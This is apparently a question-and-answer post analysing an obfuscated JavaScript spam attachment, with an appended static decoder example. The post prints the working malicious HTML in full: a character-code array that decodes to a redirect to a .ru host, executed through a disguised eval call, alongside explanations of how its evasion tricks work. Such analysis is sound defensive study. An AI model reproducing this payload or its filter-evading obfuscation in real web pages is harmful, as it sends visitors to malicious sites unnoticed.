This morning I received some spam. I noticed the attachment was an .html file. Rather than throw it away, I took it as a learning opportunity: I copied it to my desktop, renamed it to .txt and loaded it into Notepad.

Here is the html + obfuscated script that appeared in the spam attachment:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>  
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>

<script>asgq=    [0x76,0x61,0x72,0x31,0x3d,0x34,0x39,0x3b,0xa,0x76,0x61,0x72,0x32,0x3d,0x76,0x61,0x72,0x31,0x3b,0xa,0x69,0x66,0x28,0x76,0x61,0x72,0x31,0x3d,0x3d,0x76,0x61,0x72,0x32,0x29,0x20,0x7b,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x6c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3d,0x22,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x67,0x69,0x6c,0x69,0x61,0x6f,0x6e,0x73,0x6f,0x2e,0x72,0x75,0x3a,0x38,0x30,0x38,0x30,0x2f,0x66,0x6f,0x72,0x75,0x6d,0x2f,0x6c,0x69,0x6e,0x6b,0x73,0x2f,0x63,0x6f,0x6c,0x75,0x6d,0x6e,0x2e,0x70,0x68,0x70,0x22,0x3b,0x7d];try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=56;if(dbshre){vfvwe=0;    try{}catch(agdsg){vfvwe=1;}if(!vfvwe){e=window["e".concat("val")];}
 s="";for(i=0;i-105!=0;i++){if(window.document)s+=String.fromCharCode(asgq[i]);}
 z=s;e(s);}}</script>
</body>
</html>

The first thing I did was line it up to make it more readable:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Please wait</title>
</head>
<body>  
<h1><b>Please wait. You will be forwarded.. . </h1></b>
<h4>Internet Explorer / Mozilla Firefox compatible only</h4><br>

<script>
asgq=[0x76,0x61,0x72,0x31,0x3d,0x34,0x39,0x3b,0xa,0x76,0x61,0x72,0x32,0x3d,0x76,0x61,0x72,0x31,0x3b,0xa,0x69,0x66,0x28,0x76,0x61,0x72,0x31,0x3d,0x3d,0x76,0x61,0x72,0x32,0x29,0x20,0x7b,0x64,0x6f,0x63,0x75,0x6d,0x65,0x6e,0x74,0x2e,0x6c,0x6f,0x63,0x61,0x74,0x69,0x6f,0x6e,0x3d,0x22,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,0x67,0x69,0x6c,0x69,0x61,0x6f,0x6e,0x73,0x6f,0x2e,0x72,0x75,0x3a,0x38,0x30,0x38,0x30,0x2f,0x66,0x6f,0x72,0x75,0x6d,0x2f,0x6c,0x69,0x6e,0x6b,0x73,0x2f,0x63,0x6f,0x6c,0x75,0x6d,0x6e,0x2e,0x70,0x68,0x70,0x22,0x3b,0x7d];
try{document.body&=0.1}
catch(gdsgsdg)
{
  zz=3;
  dbshre=56;
  if(dbshre){
    vfvwe=0;
    try{}
    catch(agdsg)
    {vfvwe=1;}
    if(!vfvwe){
      e=window["e".concat("val")];
    }
    s="";
    for(i=0;i-105!=0;i++){
      if(window.document)
        s+=String.fromCharCode(asgq[i]);
    }
    z=s;
    e(s);
  }
}
</script>
</body>
</html>

At this point it is obvious that the script author hid the good stuff in the asgq array as character codes. 0x76 = "v", 0x61 = "a", 0x72 = "r" and so on... hey, the first 3 elements already spell out "var"!

asgq.length = 105. In the for loop, the author uses the end condition "i-105!=0", which is a confusing way of saying i < asgq.length. "zz=3;" does not seem to do anything / take part in the rest of the script. There is also an unmatched "{" after the first catch statement.

I ran the for loop and unpacked the array into an alert box. Here is what I got:

" var1=49; var2=var1; if(var1==var2) {document.location="http://giliaonso.ru:8080/forum/links/column.php";} "

So the author is going to the trouble of making 49 = 49 with character codes, and if 49 = 49, then window.location = russian site.

My questions:

  1. The author is using a try-catch statement. The first try condition is (document.body&=0.1). Is this designed to fail and proceed to the catch part of the statement, or is this some bitwise operation? If it is bitwise, why "= 0.1"?

  2. The first catch is passing "agdsg". I have only ever seen catch(e) passing "e". What does passing anything other than e do?

  3. What exactly is the line "e=window["e".concat("val")];" doing? It seems to be acting as a function declaration that the author later calls: "e(s);" where "s" is the unpacked array.

Any help is appreciated.

1 Answer

1) This tries to assign 0 to document.body, which throws an error:

document.body&=0.1
//is the same as
document.body = document.body & 0.1;
//document.body & *anything* returns 0

2) catch takes a variable name as its parameter, and you can call it whatever you like (including agdsg).

3) Let's break it down:

e=window["e".concat("val")];
//"e".concat("val") returns "eval"
e=window["eval"]
//which gives you the global "eval()" function

Basically, the author decodes that array into a string of code to execute, then uses eval() to run it. The reason they don't just write eval("var ...") is that obfuscating the eval call (as well as the string) makes it harder for a filter (or a human) to see that it is running eval. If a filter knew it was running eval, it might inspect the string and stop the redirect code.

answered 2013-03-05T20:03:36.897
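A static decoder for the pattern discussed in the question and the answer, as an added example that is not part of the original post: it rebuilds the string the script would hand to eval() from the number array and flags the window["e".concat("val")] alias, without executing any of the attachment's code. The host redirect.example.invalid, the sample HTML and the function names are constructed for this example.

```javascript
// Added example (not from the question or answer): a static decoder for the
// char-code-array trick above. It reads the .html text, rebuilds the string the
// script would hand to eval(), and flags the indirect eval alias, without running
// any of the attachment's code.

// Recover the hidden string: the script's String.fromCharCode loop, applied to
// numbers parsed out of the source text instead of executed in a browser.
function decodeCharCodeArray(html) {
  const m = html.match(/\[\s*((?:0x[0-9a-fA-F]+|\d+)\s*(?:,\s*(?:0x[0-9a-fA-F]+|\d+)\s*)*)\]/);
  if (!m) return null;                       // no numeric array: nothing to decode
  return String.fromCharCode(...m[1].split(',').map((t) => Number(t.trim())));
}

// Resolve a property name built only from string literals glued together with
// + or .concat(): "e".concat("val") and "ev"+"al" both yield "eval".
function resolveStringExpr(expr) {
  const parts = expr.match(/["']([^"']*)["']/g);
  return parts ? parts.map((p) => p.slice(1, -1)).join('') : null;
}

// Triage one attachment: decoded payload, redirect target (if any) and the
// obfuscation indicators a mail filter would want to log.
function analyzeAttachment(html) {
  const findings = [];
  for (const m of html.matchAll(/window\s*\[([^\]]+)\]/g)) {
    const name = resolveStringExpr(m[1]);
    if (name === 'eval' || name === 'Function') {
      findings.push(`indirect ${name} via window[${m[1].trim()}]`);
    }
  }
  const payload = decodeCharCodeArray(html);
  const hit = payload && payload.match(/(?:document|window)\.location\s*=\s*["']([^"']+)["']/);
  return { payload, redirect: hit ? hit[1] : null, findings };
}

// Constructed sample with the same structure as the attachment above, but a
// placeholder host. toCodes() only exists to keep the fixture legible; a real
// attachment carries nothing but the numbers.
const toCodes = (s) => [...s].map((c) => '0x' + c.charCodeAt(0).toString(16)).join(',');
const SAMPLE_HTML = `<html><body><script>asgq=[${toCodes(
  'var1=49;\nvar2=var1;\nif(var1==var2) {document.location="http://redirect.example.invalid:8080/column.php";}'
)}];try{document.body&=0.1}catch(g){e=window["e".concat("val")];s="";` +
  `for(i=0;i<asgq.length;i++){s+=String.fromCharCode(asgq[i]);}e(s);}</script></body></html>`;

console.log(analyzeAttachment(SAMPLE_HTML));
```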